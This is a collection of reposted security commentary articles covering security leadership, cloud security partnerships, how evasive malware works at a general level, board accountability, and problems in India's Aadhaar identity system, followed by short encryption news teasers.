Centering Your Security Strategy on Leadership, Resilience and Fundamentals

Cyber security technology solutions continue to advance, as do cyber-attack methods. Cisco is tracking this phenomenon in malware development by measuring Time To Evolve (TTE) — essentially the time that lapses between distinct changes in evasive file and delivery tactics. Malicious hackers’ inventiveness and sophistication has allowed six malware families to continue creating havoc over an extended period of time.  These strategies only partially explain why we see the same vulnerabilities being exploited year after year. If we worry too much about sophisticated zero-day attacks or become distracted by the overblown promises of the latest software package, we continue to neglect the elements that are proven to protect or expose us.

Verizon’s 2017 Data Breach Investigations Report highlighted that, yet again, it’s the fundamentals that will be our undoing —but they could also be our saving grace. A vast majority of breaches (88%) fall into one of nine attack patterns – the same nine patterns Verizon identified three years ago. Phishing is still among the most prevalent attack vectors, and lots of people are still falling for it: the report found one in 14 users had opened a phishy link or attachment, and a quarter of them did it more than once. Two-thirds of malware is installed via malicious attachments; likewise, ransomware and web application attacks frequently use phishing emails, texts, and calls to initiate access. Finally, the password plague continues to sicken security programs – 81% of hacking breaches used stolen or weak passwords to gain a foothold.

The bad news is that we don’t seem to be learning from our mistakes as quickly as we should. The good news is, raising security awareness across the enterprise doesn’t require capital investments or complex upgrades. It requires diligence, leadership, and contextual threat intelligence — and it starts in the C-suite.

Reducing the Risk of Attack

Today, risk management largely focuses on achieving security through the management and control of known risks. The rapid evolution of opportunities and risks in cyberspace is outpacing this approach and it no longer provides the required protection. Cyber resilience requires recognition that organizations must prepare now to deal with severe impacts from cyber threats that are impossible to predict. Organizations must extend risk management to include risk resilience in order to manage, respond and mitigate any negative impacts of cyberspace activity.

Cyber resilience also requires that organizations have the agility to prevent, detect and respond quickly and effectively, not just to incidents, but also to the consequences of the incidents. This means assembling multidisciplinary teams from businesses and functions across the organization, and beyond, to develop and test plans for when breaches and attacks occur. This team should be able to respond quickly to an incident by communicating with all parts of the organization, individuals who might have been compromised, shareholders, regulators and other stakeholders who might be affected.

Cyber resilience is all about ensuring the sustainability and success of an organization, even when it has been subjected to the almost inescapable attack. By adopting a realistic, broad-based, collaborative approach to cyber security and resilience, government departments, regulators, senior business managers and information security professionals will be better able to understand the true nature of cyber threats and respond quickly and appropriately.

Focus on the Fundamentals

Business leaders recognize the enormous benefits of cyberspace and how the Internet greatly increases innovation, collaboration, productivity, competitiveness and engagement with customers. Unfortunately, they have difficulty assessing the risks versus the rewards. One thing that organizations must do is ensure they have standard security measures in place. This means going well beyond implementing the latest security tools.

Cisco’s 2017 survey of security capabilities found that while CSOs and SecOps managers are confident they have the best technologies available, they are much less certain that, in the face of skills and budget shortages, they are making the best use of these tools. Such fundamental shortcomings are a good place to start if you’re looking to fortify your existing defenses.

Every type and size of organization is vulnerable to cyber-attacks. To control risk and damage, each organization has to develop and maintain a thorough understanding of its particular weak points, targeted mission-critical information assets and industry-specific threat vectors. Executives who leverage threat intelligence, maintain strong contextual awareness, and stay committed to managing insider threats help their organizations develop a deeper culture of defense, injecting security throughout the enterprise.

Companies that prioritize well-equipped security programs and widespread security awareness are more prepared to grow, innovate and compete.  In order to consistently make better decisions about how to align business and security objectives to manage risk, protect brand reputation, and respond effectively to incidents, boards and senior executives have to remain steadfastly engaged.

About the author: Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include strategy, information technology, cyber security and the emerging security threat landscape across both the corporate and personal environments. Previously, he was senior vice president at Gartner.

Copyright 2010 Respective Author at Infosec Island

An Open Letter to AWS CEO Andy Jassy on Cloud Security Innovation

Dear Andy,

Congratulations to you and the entire Amazon team on your latest quarterly results. Your team’s contribution continues to be impressive. I was particularly excited to hear that AWS’ expanding partner base continues to be an important driver of your growth.

From where I sit, your commitment and focus on fueling the ecosystem has never wavered. It once took a few hours to walk the partner expo at re:Invent and the AWS Summits; now it takes a day or more. So, every time I read a media report that says you have partners in the crosshairs, I ask myself the same question: Did I miss the memo advising all small, innovative startups that it’s time to close their doors because you’re investing in technology and companies to make AWS better and more secure?

The focus of late has been on cloud security and rightfully so. Organizations of all sizes are migrating to the cloud to take advantage of cost savings, efficiency gains, and the flexibility to scale. Of course, fraud, hacking and malware are proliferating just as quickly as the good kind of cloud technology, so security is becoming the top priority for organizations that want to stay protected while taking full advantage of the benefits of running in the cloud. 

I will always maintain my steadfast perspective that collaboration of innovators, regardless of size, is essential in helping businesses of all sizes and cyber sophistication to reduce their cyber risk.

It is true that cybersecurity startups do not have as loud a voice as AWS and other large cloud providers. Their greatest asset is the ability to innovate, attract passionate and high-intellect employees looking to do meaningful and impactful work without the bureaucracy, traditional process and politics of the larger, more established companies.

While the story of AWS being a threat to companies like ours may get a lot of clicks and shares (I can attest to this first-hand), it distracts the community from the bigger story about the magnitude of the cybersecurity challenge. The reality of the cybersecurity market is that the sophistication of the attacks and the implications of lengthy times to detect, understand and remediate put businesses of all sizes at risk.  

The role of cybersecurity providers is to provide businesses with security context as a means of reducing the “mean time to know” and accelerate actions to remediation. 

The bigger story is about how continued investments, organic or inorganic, strengthen security context for businesses of all sizes. The more security signals, the more security context; the more context, the more accelerated “mean time to know”; the faster “mean time to know,” the faster the actions to remediate security risk. 

The objective of every startup should be to provide world-class solutions that ingest security indicators that Amazon and numerous partners across the AWS ecosystem make available. This provides correlated security context and reduces business resource requirement to quickly address the growing cyber threats businesses face every day.   

We are not threatened by the actions of AWS but instead are encouraged by it. We welcome the additional security indicators you are making available through your tools and services. I strongly feel that “us vs. them” is not a vendor vs. vendor discussion. Rather, “us vs. them” is the collaboration of innovative cyber companies of all sizes “versus” those that are motivated by widespread global economic, public safety and national security disruption.

The collaboration of innovative cyber security companies is a win-win for all. We are not willing to close our doors at the “threat” of larger companies investing in the cyber market, but instead, we use it as fuel to further our passion and conviction for our defined mission.

This is what is in the best interest of our mutual customers. I encourage you to maintain your commitment to the ecosystem and for my fellow partners to work together to help customers defend and protect themselves from the increased assault on the data companies are moving to the cloud.

Best regards,

Brian Ahern

CEO & Chairman, Threat Stack

Copyright 2010 Respective Author at Infosec Island

Beat Them at Their Own Game: Understanding and Neutralizing Evasive Malware Tactics in the Face of Rising Attacks

Chasing malware developers through their cyber rabbit holes might be a fun challenge for security researchers, but for the rest of us, the effectiveness of modern attack methods is frustrating and alarming. Incidents that involved evasive malware, and in particular fileless techniques for bypassing endpoint security measures, were prevalent in 2017. They are set to be even more damaging, costly, and exasperating in 2018.

It’s an old story by now — the more security pros learn about protecting their organizations against malware, the more wily and sophisticated the adversaries get. The adversaries will always have the incentive and the ability to bypass detection-based technologies. In order to protect their nefarious creations (and their investments), attackers will try everything they can in order to evade detection.

The ability for attackers to avoid being detected isn’t as simple as it sounds when an entire world’s worth of security experts, artificial intelligence systems, and endpoint protection software vendors are focused on doing just that. And the stakes are getting higher. Experts predict that this year, state-sponsored hackers, hacktivists, and crime syndicates will leverage and target major events like the Olympics and U.S midterm elections. Even more alarming, it is expected that ransomware attacks on hospitals and IoT devices will turn deadly, as attackers extort money and power by hijacking control of pacemakers and other critical equipment.

Malware developers use a number of techniques to ensure that their malicious code runs even on endpoints that use a variety of products dedicated to identifying, detecting, and eradicating malware. These techniques are well documented, can be understood by day-to-day attackers, and are increasingly offered as an easy-to-deploy service by cybercrime syndicates. Common evasive techniques include:

Refusing to Infect in “Hostile” Environments

Malware developers want to avoid having their code fingerprinted, which subsequently makes their malware known to antivirus solutions (and therefore readily blocked). Such malicious software is constructed to avoid virtualization environments, sandboxes, and antivirus solutions by shutting itself down and leaving no trace through artifacts or executed processes.

Using Memory Injection

Malicious code injects itself into trusted processes on the system, abusing the legitimate capabilities of the operating system or software to avoid solutions that look for new and unwanted files and processes. Malicious code is concealed in a file using a packer or other technique, so it arrives looking normal, injects itself into other legitimate applications, and gains a foothold. Such techniques are used in the fileless attacks mentioned above. One of these schemes recently made headlines by targeting organizations providing critical support to the Olympics. The attack combined a phishing email, a weaponized Word file, and a hidden PowerShell script. Using native PowerShell functions to evade pattern-matching solutions and other defenses, attackers are able to establish a link to a remote server, possibly with the intention of downloading more malware.

Using Document Files

Malware hides in documents (Word, Excel, PDF) using macros, website links, and exploits to bypass defenses. This type of attack can also be complex to detect. Consider, for example, a PDF file that contains an embedded Word document, which includes a macro that downloads and executes additional malicious code on an endpoint. These evasive tactics make it difficult for both traditional and next-gen AV solutions to separate malicious from non-malicious files.

Evasion techniques allow adversaries to get past even modern endpoint security solutions, regardless whether they’re based on signatures, behavioral monitoring, file reputation, machine learning, or heuristics. Besides being complex and creatively manipulative, there are several reasons why these evasion techniques work,even against modern AV defenses:

  • All forms of AV are based, at least some extent, on historical information (signatures, behavior patterns, etc), even if this information is used to develop a machine learning model. If there are no fingerprints or historical threat artifacts to “convict” for detection, the malware is invisible to these solutions.
  • Malware gets regular updates. The adversaries are motivated to keep their attack tools fresh and unknown.
  • Malware is often purpose-built to avoid detection and tested against current implementations of defense solutions. Adversaries ensure that their attacks will be invisible to traditional as well as next-gen AV solutions by devising software that differs from expected patterns and adding combinations of obfuscation tactics.

Evolving Your Endpoint Protection Strategy

Baseline AV products, be they traditional or next gen, play an important role in safeguarding the endpoint, but attackers will always find ways around their detection-based approaches. That’s why such technologies aren’t sufficient by themselves to secure laptops, workstations, servers or other devices in the modern enterprise. To block attacks, security teams need to better understand the mechanics of evasion and the limits of signature, pattern, and behavior-based security solutions.

Mind the gap created by your security tools’ ability to detect and block malicious code and the hackers’ ability to evade detection — you can be sure they are well aware of it. Augment baseline AV with anti-evasion solutions designed to stop this kind of malware by blocking its attempts to bypass detection. In other words, focus on breaking or otherwise negating the evasive techniques themselves, rather than solely detecting the malicious software. By “attacking” attempts to evade your security solutions, you will force the adversaries to pick their poison: Implement evasion tactics and be stopped because of them, or don’t evade and be stopped by your baseline security controls.

If there is any hope of disarming modern and well-equipped attackers, we have to beat them at their game. Increasingly, that means outmatching them in a battle of wits by devising creative dodges, artful illusions, and cunning counter maneuvers.

About the author: Eddy Bobritsky is Co-Founder and CEO at Minerva Labs, a leading provider of anti-evasion technology for enterprise endpoints.

Copyright 2010 Respective Author at Infosec Island

Increasing Board Accountability and Expertise Is Critical to Security and Risk Management

2017 saw huge numbers of people affected by breaches – 145 million consumer records in the Equifax breach, 200 million voter records in Deep Root Analytics breach, a firm which has contracted with the Republican National Committee, reprehensible corporate behavior (Uber’s breach cover-up); state-sponsored attacks (Russia and North Korea have been busy); and legislative response (by states, New York’s DFS, Congressional hearings, Senate proposals, and more). Harder to quantify, but certainly a major concern, is the erosion of public trust.

Given all the attention (and the apparent lack of progress), the year ahead is certain to bring further backlash from frustrated customers, shareholders, partners, and government agencies. How do Directors prepare for this increasing accountability? Tara Swaminatha, renowned legal expert specializing in cyber security liability and risk, recently outlined developments to watch in 2018, including the push to increase cyber security expertise on corporate boards.

The Board of Directors (BoD) is ultimately responsible for the future of their company. Shareholders expect that the companies they have invested in will follow through on specific, well-informed plans to mitigate risk in every form. As we’ve seen in cases like Target, Equifax, and Uber, the first move in response to scandal and public pressure is often the departure (voluntary or otherwise) of the CEO.

Boards Must Ensure Security Efforts Align with Risk Management

Innovations in technology, online services, and cybercrime exploits create disruptive ripple effects, creating new risks for organizations and consumers. Security and risk management programs have to be resilient enough to adapt to constant change. Boards and executives are uniquely positioned to ensure that security initiatives align with business strategy and take an enterprise-wide view of risk and opportunity.

No matter what technical systems, advanced controls, or frontline security experts a company has in place, no one can say they have zero risk of a security breach. The BoD needs to focus on asking, and answering, tough questions to ensure risks are understood and kept at acceptable levels. They must play out the scenarios — what would the aftermath of a breach look like in your organization? Would investigators find evidence of negligence, as in the Target Stores breach, or glaringly insufficient standards of care? In the final analysis, answers to these questions will determine levels of liability.  BoD’s have to understand this. 

The questions that frame this responsibility at a high level are these:

  1. Does my company perform reviews on a regular basis for vulnerabilities that could present risk to us or our customers?
  2. Has my company developed an Acceptable Risk Profile, and a methodology for prioritizing risks?
  3. Does my company have a plan to address these risks, and are we executing against that plan

Board level reporting is key —BoDs need current, clear information about the effectiveness of their security programs, reported on a consistent basis. Specific examples of useful information for Board level decisions include:

  • Trend data for measuring effectiveness of security investments;
  • Year over year external security assessment test results;
  • Employee security awareness training completion statistics;
  • Results from incident response table top exercises; and third party risk reports.

Board Education and Risk Awareness

The BoD should approve an Acceptable Risk Profile that can help shape risk reduction programs and reporting. Boards should also review annual risk assessments and evaluate how resources are being allocated to address the findings. This assessment must include vendor/partner risks, a key area of focus for regulation and guidance in coming years. The BoD should constantly ask those responsible to demonstrate that the information security program is aligned to the risk profile of the company and that incident response plans are in place to address the breach and attack scenarios that are most likely to occur, and most likely to cause critical damage.

In short, the Board (or appointed committee) should maintain direct visibility into cyber security posture and improvement efforts. Supporting documentation for the FFIEC’s Cyber Security Assessment Tool contains related recommendations for Boards and CEOs. While this is a tool geared toward financial institutions, the guidance is broadly applicable. It’s important for Directors and executives to familiarize themselves with national standards like the NIST Cyber security Framework as well as risk management guidance specific to their industry.

Organizations are increasingly seeking to recruit board members with cyber security expertise. Boards also engage outside experts to support and inform their decision-making. To that end, the BoD must learn how to make the best use of external consultants and identify trusted sources of timely cyber security related information, while at the same time avoiding internal politics inherent in most organizations. Annual reports geared toward non-technical professionals will help BoDs stay up to date on threat environment trends and actual breach data (e.g., Verizon – Data Breach Investigation Report, Ponemon Institute, and other IT analyst firms).

Proactive Oversight, Continuous Improvement

To stay on top of security and build resilience into your organization, it’s important to put mechanisms in place for ongoing improvement. The technology used to develop both threats and countermeasures is on a very steep growth curve. Directors will find it useful to focus on the following as they plan ahead in 2018 and beyond: organizational structure; Acceptable Risk Profile and routine risk management reviews; internal and external resources for staying informed; and regular reporting that establishes metrics for baseline performance, improvement, and measurable results.

When it comes to cyber and information security, Directors cannot afford to be bystanders. Regulators, law enforcement, legislators, clients, and consumers are watching closely. Blaming cyber criminals, IT teams, and third parties won’t keep Boards and executives out of hot water. Shrewd, visionary leadership is required to build an integrated risk management and security program. Directors who combine mature cyber security awareness with deep industry experience have an increasingly important role to play in protecting their organization and positioning it for sustained success and growth.

About the author: Greg Reber is the Founder and CEO of AsTech, a leading information security consulting firm. Reber was among the first to recognize and address the risks presented by consumer-facing applications, and built AsTech’s reputation over 20 years as a leader in risk management.

Copyright 2010 Respective Author at Infosec Island

Can India’s Biometric Identity Program Aadhaar Be Fixed?

The Supreme Court of India has commenced final hearings in the long-standing challenge to India’s massive biometric identity apparatus, Aadhaar. Following last August’s ruling in the Puttaswamy case rejecting the Attorney General’s contention that privacy was not a fundamental right, a five-judge bench is now weighing in on the privacy concerns raised by the unsanctioned use of Aadhaar.

The stakes in the Aadhaar case are huge, given the central government’s ambitions to export the underlying technology to other countries. Russia, Morocco, Algeria, Tunisia, Malaysia, Philippines, and Thailand have expressed interest in implementing biometric identification system inspired by Aadhaar. The Sri Lankan government has already made plans to introduce a biometric digital identity for citizens to access services, despite stiff opposition to the proposal, and similar plans are under consideration in PakistanNepal and Singapore. The outcome of this hearing will impact the acceptance and adoption of biometric identity across the world.

At home in India, the need for biometric identity is staked on claims that it will improve government savings through efficient, targeted delivery of welfare. But in the years since its implementation, there is little evidence to back the government’s savings claims. A widely-quoted World Bank’s estimate of $11 billion annual savings (or potential savings) due to Aadhaar has been challenged by economists.

The architects of Aadhaar also invoke inclusion to justify the need for creating a centralized identity scheme. Yet, contrary to government claims, there is growing evidence of denial of services for lack of Aadhaar card, authentication failures that have led to death, starvation, denial of medical services and hospitalization, and denial of public utilities such as pensions, rations, and cooking gas. During last week’s hearings , Aadhaar’s governing institution, the Unique Identity Authority of India (UIDAI), was forced to clarify that access to entitlements would be maintained until an adequate mechanism for authentication of identity was in place, issuing a statement that “no essential service or benefit should be denied to a genuine beneficiary for the want of Aadhaar.”

Centralized Decision-Making Compromises Aadhaar’s Security

The UIDAI was established in 2009 by executive action as the sole decision-making authority for the allocation of resources, and contracting institutional arrangements for Aadhaar numbers. With no external or parliamentary oversight over its decision-making, UIDAI engaged in an opaque process of private contracting with foreign biometric service providers to provide technical support for the scheme.  The government later passed the Aadhaar Act in 2016 to legitimize UIDAI’s powers, but used a special maneuver that enabled it to bypass the House of Parliament, where the government lacked a majority, and prevented its examination by the Parliamentary Standing Committee. The manner in which Aadhaar Act was passed further weakens the democratic legitimacy of the Aadhaar scheme as a whole.

The lack of accountability emanating from UIDAI’s centralized decision-making is evident in the rushed proof of the concept trial of the project. Security researchers have noted that the trial sampled data from just 20,000 people and nothing in the UIDAI’s report confirms that each electronic identity on the Central ID Repository (CIDR) is unique or that de-duplication could ever be achieved. As mounting evidence confirms, the decision to create the CIDR was based on an assumption that biometrics cannot be faked, and that even if they were, it would be caught during deduplication.

It emerged during the Aadhaar hearings that UIDAI has neither access to, nor control of the source code of the software used for Aadhaar CIDR. This means that to date there has been no independent audit of the software that could identify data-mining backdoors or security flaws. The Indian public has also become concerned about the practices of the foreign companies embedded in the Aadhaar system. One of three contractors to UIDAI who were provided full access to classified biometric data stored in the Aadhaar database and permitted to “collect, use, transfer, store and process the data” was US-based L-1 Identity Solutions. The company has since been acquired by a French company, Safran Technologies, which has been accused of hiding the provenance of code bought from a Russian firm to boost software performance of US law enforcement computers. The company is also facing a whistleblower lawsuit alleging it fraudulently took more than $1 billion from US law enforcement agencies.

Compromised Enrollment Scheme

The UIDAI also outsourced the responsibility for enrolling Indians in the Aadhaar system. State government bodies and large private organizations were selected to act as registrars, who, in turn, appointed enrollment agencies, including private contractors, to set up and operate mobile, temporary or permanent enrollment centers. UIDAI created an incentive based model for successful enrollment, whereby registrars would earn Rs 40-50 (about 75c) for every successful enrollment. Since compensation was tied to successful enrollment, the scheme created the incentive for operators to maximize their earning potential.

By delegating the collection of citizens’ biometrics to private contractors, UIDAI created the scope for the enrollment procedure to be compromised.  Hacks to work around the software and hardware soon emerged, and have been employed in scams using cloned fingerprints to create fake enrollments. Corruption, bribery, and the creation of Aadhaar numbers with unverified, absent or false documents have also marred the rollout of the scheme. In 2016, on being detained and questioned, a Pakistani spy produced an Aadhaar card bearing his alias and fake address as proof of identity. The Aadhaar card had been obtained through the enrollment procedure by providing fake identification information.

An India Today investigation has revealed that the misuse of Aadhaar data is widespread, with agents willing to part with demographic records collected from Aadhaar applicants for Rs 2-5 (less than a cent). Another report from 2015 suggests that the enrollment client allows operators to use their fingerprints and Aadhaar number to access, update and print demographic details of people without their consent or  biometric authentication.

More recently, an investigation by The Tribune exposed that complete access to the UIDAI database was available for Rs 500 (about $8). The reporter paid to gain access to the data including name, address, postal code, photo, phone number and email collected by UIDAI. For an additional Rs 300, the service provided access to software which allowed the printing of the Aadhaar card after entering the Aadhaar number of any individual. A young Bangalore-based engineer has been accused of developing an Android app “Aadhaar e-KYC”, downloaded over 50,000 times since its launch in January 2017. The software claimed to be able to access Aadhaar information without authorization.

In light of the unreliability of information in the Aadhaar database and systemic failure of the enrollment process, the biometric data collected before the enactment of the Aadhaar Act is an important issue before the Supreme Court. The petitioners have sought the destruction of all biometrics and personal information captured between 2009-2016 on the grounds that it was collected without informed consent and may have been compromised.

Authentication Failures

The original plans for authentication of a person holding an Aadhaar number under Section 2(c) of the Aadhaar Act, 2016 were meant to involve returning a “Yes” if the person’s biometric and demographic data matched those captured during the enrollment process, and “No” if it did not. But somewhere along the way, this policy changed, and in 2016, the UIDAI introduced a new mode of authentication, whereby on submitting biometric information  against the Aadhaar number would result in their demographic information being returned.

This has created a range of public and private institutions using Aadhaar-based authentication for the provision of services. However authentication failures due to incorrect captured fingerprints, or a change in biometric details because of old age or wear and tear are increasingly common. The ability to do electronic authentication is also limited in India and therefore, printed copies of Aadhaar number and demographic details are considered as identification.

There are two main issues with this. First, as Aadhaar copies are just pieces of paper that can be easily faked, the use and acceptance of physical copies creates avenue for fraud.  UIDAI could limit the use of physical copies: however doing so would deprive beneficiaries if authentication fails. Second, Aadhaar numbers are supposed to be secret: using physical copies encourage that number to be revealed and used publicly. For the UIDAI whose aim is speedy enrollment and provision of services despite authentication failure, there is no incentive to stop the use of printed Aadhaar numbers.

Data security has also been weakened because institutions using Aadhaar for authentication have not met the standards for processing and storing data. Last year, UIDAI had to get more than 200 Central and State government departments, including educational institutes, to remove lists of Aadhaar beneficiaries, along with their name, address, and Aadhaar numbers had been uploaded and available on their public websites.

Securing Aadhaar

Can Aadhaar be secured? Not without significant institutional reforms, no. Aadhaar does not have an independent threat-analyzing agency: securing biometric data that has been collected falls under the purview of UIDAI. The agency does not have a Chief Information Officer (CIO) and has no defined standard operating procedures for data leakages and security breaches. Demographic information linked to an Aadhaar number, made available to private parties during authentication, are already being collected and stored externally by those parties; the UIDAI has no legal power or regulatory mechanism to prevent this. The existence of parallel databases means that biometric and demographic information is increasingly scattered among government departments and private companies, many of whom have little conception of, or incentive to ensure data security.

Second order tasks of oversight and regulatory enforcement serve a critical function in creating accountability. Although UIDAI has issued legally-enforceable rules, there is no monitoring or enforcement agency, either within UIDAI or without, to see if these rules are being followed. For example, an audit of enrollment centers revealed that UIDAI had no way of knowing if operators were retaining biometrics nor for how long.

UIDAI has also neither adopted, nor encouraged reporting of software vulnerabilities or testing enrollment hardware. Reporting of security vulnerabilities provides learning opportunities and improves coordination; security researchers can fulfill the critical task of enabling institutions to identify failures, allowing  incremental improvements to the system. But far from encouraging such security research, UIDAI has filed FIRs against researchers and reporters that uncovered flaws in the Aadhaar ecosystem.

As controversies over its ability to keep its data secure has grown, the agency has stuck to its aggressive stance, vehemently refuting any suggestion of the vulnerabilities in the Aadhaar apparatus. This attitude is perplexing given the number of data breaches and procedural gaps that are being uncovered every day. UIDAI is so confident of its security that it filed an affidavit before the Supreme Court in the Aadhaar case which claims that the data cannot be hacked or breached. UIDAI’s defiance of their own patchy record hardly provides much cause for confidence.

The Way Forward 

The current Aadhaar regime is structured to radically centralize the implementation of Indian government and private digital authentication systems. But a credible national identity system cannot be created by an opaque, unaccountable centralized agency that chooses not to follow democratic procedures when creating its rules. It would have made more sense to confine UIDAI’s role to maintaining the legal structure that secures the individual right over their data, enforces contracts, ensures liability for data breaches, and performs dispute resolution. In that way, the jurisdictional authority of UIDAI would be limited to tasks where competition cannot be an organizing principle.

The present scheme has created a market of institutions that use Aadhaar for authentication of identity in the provision of services with varying degree of transparency and privacy. The central control of the scheme is too rigid in some ways, as the bureaucratic structure of Aadhaar does not facilitate adaptation to security threats, or allow vendors or private companies to improve data protection practices. Yet in other ways, it is not strong enough, given the security lapses that it has enabled by giving multiple parties free access to the Aadhaar database.

By making Aadhaar mandatory, UIDAI has taken away the right of individuals to exit these unsatisfactory arrangements. The coercive measures taken by the State to encourage the adoption of Aadhaar have introduced new risks to individuals’ data and national security. Even the efficiency argument has fallen flat, as it is negated by the unreliability of Aadhaar authentication. The tragedy of Aadhaar is that not only does it fail to generate efficiency and justice, but also introduces significant economic and social costs.

All in all, it’s hard to see how this mess can be fixed without scrapping the system and—perhaps—starting again from scratch. As drastic as that sounds, the current Supreme Court challenge may, ironically, provide a golden opportunity to revamp the fatally flawed existing institutional arrangements behind Aadhaar, and provide the Indian government with a fresh opportunity to learn from the mistakes that brought it to this point.

Crypto is For Everyone—and American History Proves It

Over the last year, law enforcement officials around the world have been pressing hard on the notion that without a magical “backdoor” to access the content of any and all encrypted communications by ordinary people, they’ll be totally incapable of fulfilling their duties to investigate crime and protect the public. EFF and many others have pushed back—including launching a petition with our friends to SaveCrypto, which this week reached 100,000 signatures, forcing a response from President Obama.

Read more…

How to Protect Yourself from the NSA If You Use 1024-bit DH Encryption

In a post on Wednesday, researchers Alex Halderman and Nadia Heninger presented compelling research suggesting that the NSA has developed the capability to decrypt a large number of HTTPS, SSH, and VPN connections using an attack on common implementations of the Diffie-Hellman key exchange algorithm with 1024-bit primes. Earlier in the year, they were part of a research group that published a study of the Logjam attack, which leveragedoverlooked and outdated code to enforce “export-grade” (downgraded, 512-bit) parameters for Diffie-Hellman. By performing a cost analysis of the algorithm with stronger 1024-bit parameters and comparing that with what we know of the NSA “black budget” (and reading between the lines of several leaked documents about NSA interception capabilities) they concluded that it’s likely NSA has been breaking 1024-bit Diffie-Hellman for some time now.

Read more…

SETI: Snowden Should Stick to Human Affairs and Let Us Figure out How to Find Aliens

Edward Snowden may know a thing or two about encryption, but his remarks on encrypted alien signals aren’t sitting quite right with SETI. According to those in the business of searching for extraterrestrials, Snowden should probably keep his security advice limited to human affairs.

Read more…

Edward Snowden: Advanced Encryption May Stop Us Communicating With Aliens

On Friday, Neil deGrasse Tyson welcomed Edward Snowden to his StarTalk podcast. Along with the usual conversations about privacy and government, Snowden had another important warning to provide: encryption may hurt our abilities to see, or be seen by, extraterrestrials.

Read more…

Encrypted cloud storage service Wuala announced today they’re shutting down, going read-only on Sept

Encrypted cloud storage service Wuala announced today they’re shutting down, going read-only on September 30th and purging data on November 15th. Wuala was one of our favorite secure cloud storage services , but they recommend another of our faves, Tresorit. You can read more here.…

Read more…

Social Media Auto Publish Powered By :